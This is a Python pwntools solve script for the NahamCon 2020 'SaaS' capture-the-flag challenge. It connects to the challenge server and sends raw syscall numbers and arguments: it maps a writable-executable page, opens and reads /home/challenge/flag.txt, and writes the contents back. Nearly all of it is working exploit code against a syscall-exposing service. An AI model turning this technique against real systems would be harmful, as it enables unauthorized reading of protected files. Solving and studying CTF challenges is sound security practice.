SaaS from NahamCon 2020

saas_final_solve.py

from pwn import *
r = remote('jh2i.com', 50016)
#r = process('./saas')

def syscall(a2):
    print ("syscall", a2)
    for a in a2:
        txt = r.recv(timeout=2).strip()
        print (txt.strip(), len(txt))
        r.sendline(str(a))
def mmap():
    args = [9, 4096, 1024, 7, 34, 0, -1]
    syscall(args)

def read(s = "/home/challenge/flag.txt\0"):
    args = [0, 0, 0x10000, len(s), 0, 0, 0]
    syscall(args)
    r.sendline(s)

def write(addr = 0x10100, fd = 1):
    args = [1, fd, addr, 0x400, 0,0,0]
    syscall(args)
    abc = r.recv(timeout=2)
    print (abc.replace("\x00", ""), len(abc))

def op3n(addr = 0x10000):
    args = [2, addr, 0, 0, 0,0,0]
    syscall(args)

def opendir(addr = 0x10000):
    args = [2, addr, 65536, 0, 0, 0, 0]
    syscall(args)

def readfile(addr=0x10100, fd = 6):
    args = [0, fd, addr, 0x400, 0, 0, 0]
    syscall(args)

def getdents(fd = 6, addr = 0x10100, count = 0x400):
    args = [78, fd, addr, count, 0, 0,0]
    syscall(args)

def getcwd(addr=0x10200):
    args = [79, addr, 0x100, 0,0,0,0]
    syscall(args)

raw_input("checkpoint")
mmap()
read()
#opendir()
#getdents()
op3n()
readfile()
#getcwd()
write()
r.interactive()